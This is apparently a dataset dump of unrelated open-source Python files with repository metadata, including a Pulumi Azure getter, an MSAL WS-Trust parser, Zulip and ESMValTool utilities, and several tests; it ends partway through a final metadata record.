/software/SchemaTerms/sdoterm.py
|
c1d2bb118b5b620dc6a890f206a254c7d75831eb
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
schemaorg/schemaorg
|
a003f55f639c4c0c6b34aac2615f01264f5fe615
|
bd3df4106937863a6ae9351fcb4782b67a016357
|
refs/heads/main
| 2023-08-15T04:51:12.309628
| 2023-07-19T10:25:18
| 2023-07-19T10:25:18
| 16,394,957
| 5,326
| 969
|
Apache-2.0
| 2023-08-23T14:27:50
| 2014-01-30T23:58:35
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,419
|
py
|
sdoterm.py
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import logging
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
import rdflib
from rdflib import URIRef
import io
class SdoTerm():
TYPE = "Type"
PROPERTY = "Property"
DATATYPE = "Datatype"
ENUMERATION = "Enumeration"
ENUMERATIONVALUE = "Enumerationvalue"
REFERENCE = "Reference"
def __init__(self,termType,Id,uri,label):
self.expanded = False
self.termType = termType
self.uri = uri
self.id = Id
self.label = label
self.acknowledgements = []
self.superPaths = []
self.comment = ""
self.comments = []
self.equivalents = []
self.examples = []
self.pending = False
self.retired = False
self.extLayer = ""
self.sources = []
self.subs = []
self.supers = []
self.supersededBy = ""
self.supersedes = ""
self.superseded = False
self.termStack = []
def __str__(self):
return ("<%s: '%s' expanded: %s>") % (self.__class__.__name__.upper(),self.id,self.expanded)
class SdoType(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.TYPE,Id,uri,label)
self.properties = []
self.allproperties = []
self.expectedTypeFor = []
class SdoProperty(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.PROPERTY,Id,uri,label)
self.domainIncludes = []
self.rangeIncludes = []
self.inverse = ""
class SdoDataType(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.DATATYPE,Id,uri,label)
self.properties = []
self.allproperties = []
self.expectedTypeFor = []
class SdoEnumeration(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.ENUMERATION,Id,uri,label)
self.properties = []
self.allproperties = []
self.expectedTypeFor = []
self.enumerationMembers = []
class SdoEnumerationvalue(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.ENUMERATIONVALUE,Id,uri,label)
self.enumerationParent = ""
class SdoReference(SdoTerm):
def __init__(self,Id,uri,label):
SdoTerm.__init__(self,SdoTerm.REFERENCE,Id,uri,label)
|
242ca9e1de638fd70ec3c13adbd425d88e523dea
|
b049a961f100444dde14599bab06a0a4224d869b
|
/sdk/python/pulumi_azure_native/devcenter/get_network_connection.py
|
4934486fee2c1fdbaf7be7cd700940c818c31cf2
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-azure-native
|
b390c88beef8381f9a71ab2bed5571e0dd848e65
|
4c499abe17ec6696ce28477dde1157372896364e
|
refs/heads/master
| 2023-08-30T08:19:41.564780
| 2023-08-28T19:29:04
| 2023-08-28T19:29:04
| 172,386,632
| 107
| 29
|
Apache-2.0
| 2023-09-14T13:17:00
| 2019-02-24T20:30:21
|
Python
|
UTF-8
|
Python
| false
| false
| 10,932
|
py
|
get_network_connection.py
|
# coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetNetworkConnectionResult',
'AwaitableGetNetworkConnectionResult',
'get_network_connection',
'get_network_connection_output',
]
@pulumi.output_type
class GetNetworkConnectionResult:
"""
Network related settings
"""
def __init__(__self__, domain_join_type=None, domain_name=None, domain_password=None, domain_username=None, health_check_status=None, id=None, location=None, name=None, networking_resource_group_name=None, organization_unit=None, provisioning_state=None, subnet_id=None, system_data=None, tags=None, type=None):
if domain_join_type and not isinstance(domain_join_type, str):
raise TypeError("Expected argument 'domain_join_type' to be a str")
pulumi.set(__self__, "domain_join_type", domain_join_type)
if domain_name and not isinstance(domain_name, str):
raise TypeError("Expected argument 'domain_name' to be a str")
pulumi.set(__self__, "domain_name", domain_name)
if domain_password and not isinstance(domain_password, str):
raise TypeError("Expected argument 'domain_password' to be a str")
pulumi.set(__self__, "domain_password", domain_password)
if domain_username and not isinstance(domain_username, str):
raise TypeError("Expected argument 'domain_username' to be a str")
pulumi.set(__self__, "domain_username", domain_username)
if health_check_status and not isinstance(health_check_status, str):
raise TypeError("Expected argument 'health_check_status' to be a str")
pulumi.set(__self__, "health_check_status", health_check_status)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if networking_resource_group_name and not isinstance(networking_resource_group_name, str):
raise TypeError("Expected argument 'networking_resource_group_name' to be a str")
pulumi.set(__self__, "networking_resource_group_name", networking_resource_group_name)
if organization_unit and not isinstance(organization_unit, str):
raise TypeError("Expected argument 'organization_unit' to be a str")
pulumi.set(__self__, "organization_unit", organization_unit)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if subnet_id and not isinstance(subnet_id, str):
raise TypeError("Expected argument 'subnet_id' to be a str")
pulumi.set(__self__, "subnet_id", subnet_id)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="domainJoinType")
def domain_join_type(self) -> str:
"""
AAD Join type.
"""
return pulumi.get(self, "domain_join_type")
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> Optional[str]:
"""
Active Directory domain name
"""
return pulumi.get(self, "domain_name")
@property
@pulumi.getter(name="domainPassword")
def domain_password(self) -> Optional[str]:
"""
The password for the account used to join domain
"""
return pulumi.get(self, "domain_password")
@property
@pulumi.getter(name="domainUsername")
def domain_username(self) -> Optional[str]:
"""
The username of an Active Directory account (user or service account) that has permissions to create computer objects in Active Directory. Required format: admin@contoso.com.
"""
return pulumi.get(self, "domain_username")
@property
@pulumi.getter(name="healthCheckStatus")
def health_check_status(self) -> str:
"""
Overall health status of the network connection. Health checks are run on creation, update, and periodically to validate the network connection.
"""
return pulumi.get(self, "health_check_status")
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> str:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkingResourceGroupName")
def networking_resource_group_name(self) -> Optional[str]:
"""
The name for resource group where NICs will be placed.
"""
return pulumi.get(self, "networking_resource_group_name")
@property
@pulumi.getter(name="organizationUnit")
def organization_unit(self) -> Optional[str]:
"""
Active Directory domain Organization Unit (OU)
"""
return pulumi.get(self, "organization_unit")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> str:
"""
The subnet to attach Virtual Machines to
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
Azure Resource Manager metadata containing createdBy and modifiedBy information.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
class AwaitableGetNetworkConnectionResult(GetNetworkConnectionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNetworkConnectionResult(
domain_join_type=self.domain_join_type,
domain_name=self.domain_name,
domain_password=self.domain_password,
domain_username=self.domain_username,
health_check_status=self.health_check_status,
id=self.id,
location=self.location,
name=self.name,
networking_resource_group_name=self.networking_resource_group_name,
organization_unit=self.organization_unit,
provisioning_state=self.provisioning_state,
subnet_id=self.subnet_id,
system_data=self.system_data,
tags=self.tags,
type=self.type)
def get_network_connection(network_connection_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNetworkConnectionResult:
"""
Gets a network connection resource
Azure REST API version: 2023-04-01.
:param str network_connection_name: Name of the Network Connection that can be applied to a Pool.
:param str resource_group_name: The name of the resource group. The name is case insensitive.
"""
__args__ = dict()
__args__['networkConnectionName'] = network_connection_name
__args__['resourceGroupName'] = resource_group_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:devcenter:getNetworkConnection', __args__, opts=opts, typ=GetNetworkConnectionResult).value
return AwaitableGetNetworkConnectionResult(
domain_join_type=pulumi.get(__ret__, 'domain_join_type'),
domain_name=pulumi.get(__ret__, 'domain_name'),
domain_password=pulumi.get(__ret__, 'domain_password'),
domain_username=pulumi.get(__ret__, 'domain_username'),
health_check_status=pulumi.get(__ret__, 'health_check_status'),
id=pulumi.get(__ret__, 'id'),
location=pulumi.get(__ret__, 'location'),
name=pulumi.get(__ret__, 'name'),
networking_resource_group_name=pulumi.get(__ret__, 'networking_resource_group_name'),
organization_unit=pulumi.get(__ret__, 'organization_unit'),
provisioning_state=pulumi.get(__ret__, 'provisioning_state'),
subnet_id=pulumi.get(__ret__, 'subnet_id'),
system_data=pulumi.get(__ret__, 'system_data'),
tags=pulumi.get(__ret__, 'tags'),
type=pulumi.get(__ret__, 'type'))
@_utilities.lift_output_func(get_network_connection)
def get_network_connection_output(network_connection_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetNetworkConnectionResult]:
"""
Gets a network connection resource
Azure REST API version: 2023-04-01.
:param str network_connection_name: Name of the Network Connection that can be applied to a Pool.
:param str resource_group_name: The name of the resource group. The name is case insensitive.
"""
...
|
f5f449e826d68c681c0727bb8e14ee019f6e279d
|
519037f251bf4a46f166529c9cc44f6ad6b54d4d
|
/tests/exploratory/multiple_basedirs/radish2/steps.py
|
793b431cf5d0d878ea1f8b1e525e56a41bc825c6
|
[
"MIT"
] |
permissive
|
radish-bdd/radish
|
0783d68b4faa3bfdb4364475353a4113b5e1aa70
|
1bc9e001c24c263ad8ce45d2dff97b89d41082a8
|
refs/heads/main
| 2023-08-22T17:33:14.194441
| 2023-08-17T18:24:32
| 2023-08-17T18:24:32
| 36,678,450
| 193
| 53
|
MIT
| 2023-08-17T18:21:36
| 2015-06-01T17:59:33
|
Python
|
UTF-8
|
Python
| false
| false
| 171
|
py
|
steps.py
|
# -*- coding: utf-8 -*-
from radish import then
@then("I expect the result to be {result:g}")
def expect_result(step, result):
assert step.context.result == result
|
a188b1290fa98b1236ea19baccb602c699ea3fb1
|
952dc66c61966f099756cdb6c2d13b40352f63cc
|
/zerver/management/commands/enqueue_digest_emails.py
|
6507335c5121cedff954d57d712caffefccc7b15
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
zulip/zulip
|
5ae6aad35fd9f72996c0a2a9cdd674400966ebf6
|
965a25d91b6ee2db54038f5df855215fa25146b0
|
refs/heads/main
| 2023-08-28T23:43:00.971110
| 2023-08-28T16:47:09
| 2023-08-28T19:33:02
| 43,160,685
| 20,239
| 8,996
|
Apache-2.0
| 2023-09-14T20:57:47
| 2015-09-25T16:37:25
|
Python
|
UTF-8
|
Python
| false
| false
| 691
|
py
|
enqueue_digest_emails.py
|
import datetime
import logging
from typing import Any
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils.timezone import now as timezone_now
from zerver.lib.digest import DIGEST_CUTOFF, enqueue_emails
from zerver.lib.logging_util import log_to_file
## Logging setup ##
logger = logging.getLogger(__name__)
log_to_file(logger, settings.DIGEST_LOG_PATH)
class Command(BaseCommand):
help = """Enqueue digest emails for users that haven't checked the app
in a while.
"""
def handle(self, *args: Any, **options: Any) -> None:
cutoff = timezone_now() - datetime.timedelta(days=DIGEST_CUTOFF)
enqueue_emails(cutoff)
|
6656a28d5aca6e1604b6dc18e799258832570af9
|
b65a7cad11c96682628ff023a24a617118733881
|
/evaluation.py
|
4b6c098ae197d7956de8970d2d2b7e858b504c4e
|
[
"MIT"
] |
permissive
|
YonghaoXu/SEANet
|
abb1f80f3ce37755d7be4fda5ab0d67ec3f3d178
|
73aea56761968562593ac81c681e791b449cb919
|
refs/heads/master
| 2021-06-19T21:02:29.472077
| 2021-06-17T01:21:53
| 2021-06-17T01:21:53
| 166,198,006
| 106
| 13
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,275
|
py
|
evaluation.py
|
import argparse
import scipy
from scipy import ndimage
import numpy as np
import sys
import torch
from torch.autograd import Variable
import torchvision.models as models
import torch.nn.functional as F
from torch.utils import data, model_zoo
from model.SEAN import SEANet
from dataset.cityscapes_dataset import cityscapesDataSet
from collections import OrderedDict
import os
from PIL import Image
from utils.tools import *
import matplotlib.pyplot as plt
import torch.nn as nn
IMG_MEAN = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32)
def get_arguments():
"""Parse all the arguments provided from the CLI.
Returns:
A list of parsed arguments.
"""
parser = argparse.ArgumentParser(description="SEAN")
parser.add_argument("--data_dir", type=str, default='/data/yonghao.xu/SegmentationData/cityscapes/',
help="target dataset path.")
parser.add_argument("--data_list", type=str, default='./dataset/cityscapes_labellist_val.txt',
help="target dataset list file.")
parser.add_argument("--ignore-label", type=int, default=255,
help="the index of the label to ignore in the training.")
parser.add_argument("--num-classes", type=int, default=19,
help="number of classes.")
parser.add_argument("--restore-from", type=str, default='/data/yonghao.xu/PreTrainedModel/GTA2Cityscapes.pth',
help="restored model.")
parser.add_argument("--snapshot_dir", type=str, default='./Snap/Maps',
help="Path to save result.")
return parser.parse_args()
def main():
"""Create the model and start the evaluation process."""
args = get_arguments()
if not os.path.exists(args.snapshot_dir):
os.makedirs(args.snapshot_dir)
f = open(args.snapshot_dir+'Evaluation.txt', 'w')
model = SEANet(num_classes=args.num_classes)
saved_state_dict = torch.load(args.restore_from)
model.load_state_dict(saved_state_dict)
model.eval()
model.cuda()
testloader = data.DataLoader(cityscapesDataSet(args.data_dir, args.data_list, crop_size=(1024, 512), mean=IMG_MEAN, scale=False, mirror=False, set='val'),
batch_size=1, shuffle=False, pin_memory=True)
input_size_target = (2048,1024)
interp = nn.Upsample(size=(1024,2048), mode='bilinear')
test_mIoU(f,model, testloader, 0,input_size_target,print_per_batches=10)
for index, batch in enumerate(testloader):
if index % 100 == 0:
print('%d processd' % index)
image, _,_, name = batch
_,output = model(image.cuda())
output = interp(output).cpu().data[0].numpy()
output = output.transpose(1,2,0)
output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)
output_col = colorize_mask(output)
output = Image.fromarray(output)
name = name[0].split('/')[-1]
output.save('%s/%s' % (args.snapshot_dir, name))
output_col.save('%s/%s_color.png' % (args.snapshot_dir, name.split('.')[0]))
f.close()
if __name__ == '__main__':
main()
|
a54e30e838964d5400b3cd48356c267cda148fc2
|
5917ffcb780cfcfe4e2b87b11fca1f68f387b239
|
/plenum/test/view_change_slow_nodes/test_view_change_2_of_4_nodes_with_old_and_new_primary.py
|
b068d153b6a3bfddb239cb9c4ca4e36d4c3294ac
|
[
"Apache-2.0"
] |
permissive
|
hyperledger/indy-plenum
|
6ff9f705af80dfa28d4cb92743683f78bb937aa3
|
698b9500ad3a7a15993af72a1c35a406c5673262
|
refs/heads/main
| 2023-08-29T01:32:26.384729
| 2023-06-20T16:42:11
| 2023-06-20T16:42:11
| 51,585,028
| 171
| 420
|
Apache-2.0
| 2023-06-20T16:42:14
| 2016-02-12T12:03:16
|
Python
|
UTF-8
|
Python
| false
| false
| 1,280
|
py
|
test_view_change_2_of_4_nodes_with_old_and_new_primary.py
|
from plenum.test.test_node import get_master_primary_node, get_first_master_non_primary_node
from plenum.test.view_change.helper import view_change_in_between_3pc
def slow_nodes(node_set):
return [get_master_primary_node(node_set),
get_first_master_non_primary_node(node_set)]
def test_view_change_in_between_3pc_2_of_4_nodes_with_old_and_new_primary(
txnPoolNodeSet, looper, sdk_pool_handle, sdk_wallet_client):
"""
- Slow processing 3PC messages for 2 of 4 node (2>f)
- Slow both current and next primaries
- do view change
"""
view_change_in_between_3pc(looper, txnPoolNodeSet,
slow_nodes(txnPoolNodeSet),
sdk_pool_handle, sdk_wallet_client)
def test_view_change_in_between_3pc_2_of_4_nodes_with_old_and_new_primary_long_delay(
txnPoolNodeSet, looper, sdk_pool_handle, sdk_wallet_client):
"""
- Slow processing 3PC messages for 2 of 4 node (2>f)
- Slow both current and next primaries
- do view change
"""
view_change_in_between_3pc(looper, txnPoolNodeSet,
slow_nodes(txnPoolNodeSet),
sdk_pool_handle, sdk_wallet_client,
slow_delay=20)
|
8022dd572b0795bc85b510297459cfdadadf5132
|
5deeb3618189cca6f66e91d1ddcb3ce63dede8ff
|
/msal/wstrust_response.py
|
9c58af23fccd539e68bf1c2f36f2af6d2313deef
|
[
"MIT"
] |
permissive
|
AzureAD/microsoft-authentication-library-for-python
|
f157efc1ec6c6d91a132f3dc8dc4742d7a309b78
|
bba6b146d6fca64d43eaf313da654c0570ccd497
|
refs/heads/dev
| 2023-09-03T14:34:20.487126
| 2023-08-23T08:10:18
| 2023-08-23T08:10:18
| 67,243,113
| 717
| 188
|
NOASSERTION
| 2023-09-12T16:46:21
| 2016-09-02T17:45:26
|
Python
|
UTF-8
|
Python
| false
| false
| 4,599
|
py
|
wstrust_response.py
|
#------------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation.
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#------------------------------------------------------------------------------
try:
from xml.etree import cElementTree as ET
except ImportError:
from xml.etree import ElementTree as ET
import re
from .mex import Mex
SAML_TOKEN_TYPE_V1 = 'urn:oasis:names:tc:SAML:1.0:assertion'
SAML_TOKEN_TYPE_V2 = 'urn:oasis:names:tc:SAML:2.0:assertion'
# http://docs.oasis-open.org/wss-m/wss/v1.1.1/os/wss-SAMLTokenProfile-v1.1.1-os.html#_Toc307397288
WSS_SAML_TOKEN_PROFILE_V1_1 = "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1"
WSS_SAML_TOKEN_PROFILE_V2 = "http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0"
def parse_response(body): # Returns {"token": "<saml:assertion ...>", "type": "..."}
token = parse_token_by_re(body)
if token:
return token
error = parse_error(body)
raise RuntimeError("WsTrust server returned error in RSTR: %s" % (error or body))
def parse_error(body): # Returns error as a dict. See unit test case for an example.
dom = ET.fromstring(body)
reason_text_node = dom.find('s:Body/s:Fault/s:Reason/s:Text', Mex.NS)
subcode_value_node = dom.find('s:Body/s:Fault/s:Code/s:Subcode/s:Value', Mex.NS)
if reason_text_node is not None or subcode_value_node is not None:
return {"reason": reason_text_node.text, "code": subcode_value_node.text}
def findall_content(xml_string, tag):
"""
Given a tag name without any prefix,
this function returns a list of the raw content inside this tag as-is.
>>> findall_content("<ns0:foo> what <bar> ever </bar> content </ns0:foo>", "foo")
[" what <bar> ever </bar> content "]
Motivation:
Usually we would use XML parser to extract the data by xpath.
However the ElementTree in Python will implicitly normalize the output
by "hoisting" the inner inline namespaces into the outmost element.
The result will be a semantically equivalent XML snippet,
but not fully identical to the original one.
While this effect shouldn't become a problem in all other cases,
it does not seem to fully comply with Exclusive XML Canonicalization spec
(https://www.w3.org/TR/xml-exc-c14n/), and void the SAML token signature.
SAML signature algo needs the "XML -> C14N(XML) -> Signed(C14N(Xml))" order.
The binary extention lxml is probably the canonical way to solve this
(https://stackoverflow.com/questions/22959577/python-exclusive-xml-canonicalization-xml-exc-c14n)
but here we use this workaround, based on Regex, to return raw content as-is.
"""
# \w+ is good enough for https://www.w3.org/TR/REC-xml/#NT-NameChar
pattern = r"<(?:\w+:)?%(tag)s(?:[^>]*)>(.*)</(?:\w+:)?%(tag)s" % {"tag": tag}
return re.findall(pattern, xml_string, re.DOTALL)
def parse_token_by_re(raw_response): # Returns the saml:assertion
for rstr in findall_content(raw_response, "RequestSecurityTokenResponse"):
token_types = findall_content(rstr, "TokenType")
tokens = findall_content(rstr, "RequestedSecurityToken")
if token_types and tokens:
# Historically, we use "us-ascii" encoding, but it should be "utf-8"
# https://stackoverflow.com/questions/36658000/what-is-encoding-used-for-saml-conversations
return {"token": tokens[0].encode('utf-8'), "type": token_types[0]}
|
8028aa1d1d3a03b809ec3369b96176feae6a846e
|
b5510b559210c385c1e86433f7ed22eeec83758c
|
/kvirt/providers/kvm/helpers.py
|
2e236c286ec15bc88aaf441da542b10eca36b052
|
[
"Apache-2.0"
] |
permissive
|
karmab/kcli
|
adae878fb84f38583032563928e401d7c71e6b86
|
7991e2d3468ce1b43a98a2f9b19db76121335f6c
|
refs/heads/main
| 2023-08-31T00:01:28.407676
| 2023-08-30T21:26:34
| 2023-08-30T21:26:34
| 67,212,828
| 430
| 149
|
Apache-2.0
| 2023-09-13T21:59:18
| 2016-09-02T10:13:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,965
|
py
|
helpers.py
|
DHCPKEYWORDS = ['T1',
'T2',
'all-subnets-local',
'arp-timeout',
'boot-file-size',
'bootfile-name',
'bootfile-param',
'bootfile-url',
'classless-static-route',
'client-arch',
'client-interface-id',
'client-machine-id',
'default-ttl',
'dns-server',
'domain-name',
'domain-search',
'ethernet-encap',
'extension-path',
'information-refresh-time',
'ip-forward-enable',
'irc-server',
'log-server',
'lpr-server',
'max-datagram-reassembly',
'mobile-ip-home',
'netbios-dd',
'netbios-nodetype',
'netbios-ns',
'netbios-scope',
'netmask',
'nis+-domain',
'nis+-server',
'nis-domain',
'nis-server',
'nntp-server',
'non-local-source-routing',
'ntp-server',
'policy-filter',
'pop3-server',
'root-path',
'router',
'router-discovery',
'router-solicitation',
'server-ip-address',
'sip-server',
'sip-server-domain',
'smtp-server',
'sntp-server',
'static-route',
'swap-server',
'tcp-keepalive',
'tcp-ttl',
'tftp-server',
'time-offset',
'trailer-encapsulation',
'user-class',
'vendor-class',
'vendor-id-encap',
'x-windows-dm',
'x-windows-fs']
|
e4196051194f73bf708993713651e40b3c9e7ea9
|
e1351a65665f78af78f191c1a7b92a8511beddb6
|
/esmvaltool/utils/prov2files.py
|
15873893d562bf74c6c3cf22e76807118a78266a
|
[
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] |
permissive
|
ESMValGroup/ESMValTool
|
5364262eee9f1bb5e8084e73e2a18565e958fdfa
|
0d2b68d6614c667141207affd7834cc49d34b203
|
refs/heads/main
| 2023-08-24T20:05:57.882973
| 2023-08-24T11:34:49
| 2023-08-24T11:34:49
| 80,120,461
| 196
| 138
|
Apache-2.0
| 2023-09-14T15:32:43
| 2017-01-26T14:15:37
|
NCL
|
UTF-8
|
Python
| false
| false
| 2,159
|
py
|
prov2files.py
|
"""Print out the input files used to generate a result."""
import argparse
from prov.model import ProvDerivation, ProvDocument
def prov2files(filename):
"""Figure out what file was generated from which source files.
Parameters
----------
filename: str
Name of the file containing the provenance.
Returns
-------
(str, list[str])
A tuple, the first entry is the name of the result
and the second entry a list of files used to compute
that result.
"""
provenance = ProvDocument.deserialize(filename, format='xml')
source_files = set()
generated_files = set()
for rec in provenance.get_records(ProvDerivation):
# Find all derivation relations
generated, used = rec.args[:2]
source_files.add(used.localpart)
generated_files.add(generated.localpart)
# Filter out intermediate files
intermediate_files = source_files & generated_files
source_files = source_files - intermediate_files
result_files = generated_files - intermediate_files
if not len(result_files) == 1:
# If this changes, need to rewrite this function so it
# builds a provenance graph.
raise ValueError("Invalid provenance file encountered,"
" ESMValTool provenance describes one result only.")
return result_files.pop(), sorted(source_files)
def main():
"""Print out a list of files."""
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
'provenance_files',
nargs='+',
type=str,
help='Path to one or more files containing provenance.')
args = parser.parse_args()
for filename in args.provenance_files:
if not filename.endswith('_provenance.xml'):
print("Skipping", filename,
"does it contain ESMValTool provenance?")
continue
result, files = prov2files(filename)
print(f"{result} was derived from:")
print('\n'.join(files))
print('')
if __name__ == '__main__':
main()
|
ff93b305bd1d0be0412f0f10c8d718276ec0efa0
|
3a6a211ea0d32405497fbd6486c490bb147e25f9
|
/catapult_build/build_steps_unittest.py
|
4d76e811997cfb4345bba00ade2aa91bf376c75a
|
[
"BSD-3-Clause"
] |
permissive
|
catapult-project/catapult
|
e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0
|
53102de187a48ac2cfc241fef54dcbc29c453a8e
|
refs/heads/main
| 2021-05-25T07:37:22.832505
| 2021-05-24T08:01:49
| 2021-05-25T06:07:38
| 33,947,548
| 2,032
| 742
|
BSD-3-Clause
| 2022-08-26T16:01:18
| 2015-04-14T17:49:05
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,910
|
py
|
build_steps_unittest.py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import unittest
from catapult_build import build_steps
class BuildStepsTest(unittest.TestCase):
def testCatapultTestList(self):
catapult_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
for test in build_steps._CATAPULT_TESTS:
self.assertIn('name', test, msg=(
'All tests in build_steps._CATAPULT_TESTS must have a name;'
' error in:\n %s' % test))
self.assertIsInstance(test['name'], str, msg=(
'Test name %s in build_steps._CATAPULT_TESTS must be a string.'
% test['name']))
self.assertIn('path', test, msg=(
'All tests in build_steps._CATAPULT_TESTS must have a path '
'relative to catapult/; error in:\n %s' % test))
abs_path = os.path.join(catapult_dir, test['path'])
self.assertTrue(os.path.exists(abs_path), msg=(
'Bad path %s in build_steps._CATAPULT_TESTS; '
' should be relative to catapult/' % test['path']))
if test.get('additional_args'):
self.assertIsInstance(test['additional_args'], list, msg=(
'additional_args %s in build_steps._CATAPULT_TESTS %s not a list'
% (test['additional_args'], test['name'])
))
if test.get('disabled'):
self.assertIsInstance(test['disabled'], list, msg=(
'disabled %s in build_steps._CATAPULT_TESTS for %s not a list'
% (test['disabled'], test['name'])
))
for platform in test['disabled']:
self.assertIn(platform, ['win', 'mac', 'linux', 'android'], msg=(
'Bad platform %s in build_steps._CATAPULT_TESTS for %s;'
'should be one of "linux", "win", "mac"' % (
platform, test['name'])
))
|
882bfa24fed605cb5465ae67378fabe07cd9aedf
|
6f2fef1b207299681f8d67d3831c400bb91de04b
|
/data_collection/gazette/spiders/ma_codo.py
|
2382d3a428457b643935c1ea8875992657704213
|
[
"MIT"
] |
permissive
|
okfn-brasil/querido-diario
|
76177747aa5ad47e99514f38402e6bc747b9a715
|
548a9b1b2718dc78ba8ccb06b36cf337543ad71d
|
refs/heads/main
| 2023-08-22T04:26:30.798196
| 2023-08-18T14:12:37
| 2023-08-18T14:12:37
| 127,598,755
| 402
| 233
|
MIT
| 2023-09-14T18:56:02
| 2018-04-01T05:01:21
|
Python
|
UTF-8
|
Python
| false
| false
| 298
|
py
|
ma_codo.py
|
import datetime as dt
from gazette.spiders.base.aplus import BaseAplusSpider
class MaCodoSpider(BaseAplusSpider):
TERRITORY_ID = "2103307"
name = "ma_codo"
start_date = dt.date(2020, 2, 17)
allowed_domains = ["codo.ma.gov.br"]
url_base = "https://www.codo.ma.gov.br/diario/"
|
8637314a87b241e05141f8da87607b4c55ae7eb9
|
0a8a4bfd6b4ffcfb7c99119c83cb3abe17c4a8f6
|
/test/util/util_test.py
|
76b7da8b4bdfe4a534f5310a6e392a8ee48c3050
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
google/openhtf
|
58c06e07508f9bb2079070a5ac03898fc68c1778
|
